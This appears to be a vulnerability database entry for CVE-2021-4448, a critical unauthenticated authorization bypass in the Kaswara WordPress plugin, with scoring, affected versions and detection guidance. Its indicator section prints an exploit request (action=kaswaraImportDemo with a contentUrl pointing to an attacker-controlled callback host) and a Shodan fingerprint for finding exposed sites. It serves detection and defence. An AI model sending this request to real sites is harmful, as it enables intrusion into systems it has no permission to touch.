cbcvebase.
CVE-2021-4448
published 2024-10-16

CVE-2021-4448: The Kaswara Modern VC Addons plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 3.0.1 due to insufficient capability…

PriorityP181critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
1.34%
67.8th percentile
The Kaswara Modern VC Addons plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 3.0.1 due to insufficient capability checking on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of unauthorized actions such as importing data, uploading arbitrary files, deleting arbitrary files, and more.

Affected

2 ranges
VendorProductVersion rangeFixed in
kaswara_projectkaswara<= 3.0.1
sayenthemeskaswara_modern_vc_addons<= 3.0.1

Detection & IOCsextracted from sources · hover to see the quote

url/wp-admin/admin-ajax.php
commandaction=kaswaraImportDemo&contentUrl=http://{{interactsh-url}}/
  • Detect exploitation attempts by monitoring POST requests to /wp-admin/admin-ajax.php with the body parameter 'action=kaswaraImportDemo', which is the unauthenticated AJAX action abused in this CVE.
  • A successful server-side request triggered by the exploit will cause the WordPress instance to make an outbound HTTP request to an attacker-controlled URL supplied in the 'contentUrl' parameter.
  • A vulnerable server response body will contain the string 'missing/invalid WXR version number', confirming the AJAX action was reached and executed without authentication.
  • Shodan fingerprinting for exposed vulnerable instances can use the HTML keyword 'kaswara' to identify WordPress sites running the plugin.
  • The vulnerability affects all Kaswara Modern VC Addons plugin versions up to and including 3.0.1; version-based detection should flag any installation at or below this version.
  • ·The exploit requires no authentication (PR:N, UI:N); any unauthenticated HTTP client can trigger the vulnerable AJAX actions, so network-layer controls alone are insufficient.
  • ·Multiple AJAX actions beyond 'kaswaraImportDemo' are affected; detection rules scoped only to this single action may miss other exploitation vectors exposed by the same missing-authorization flaw.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck7.3HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.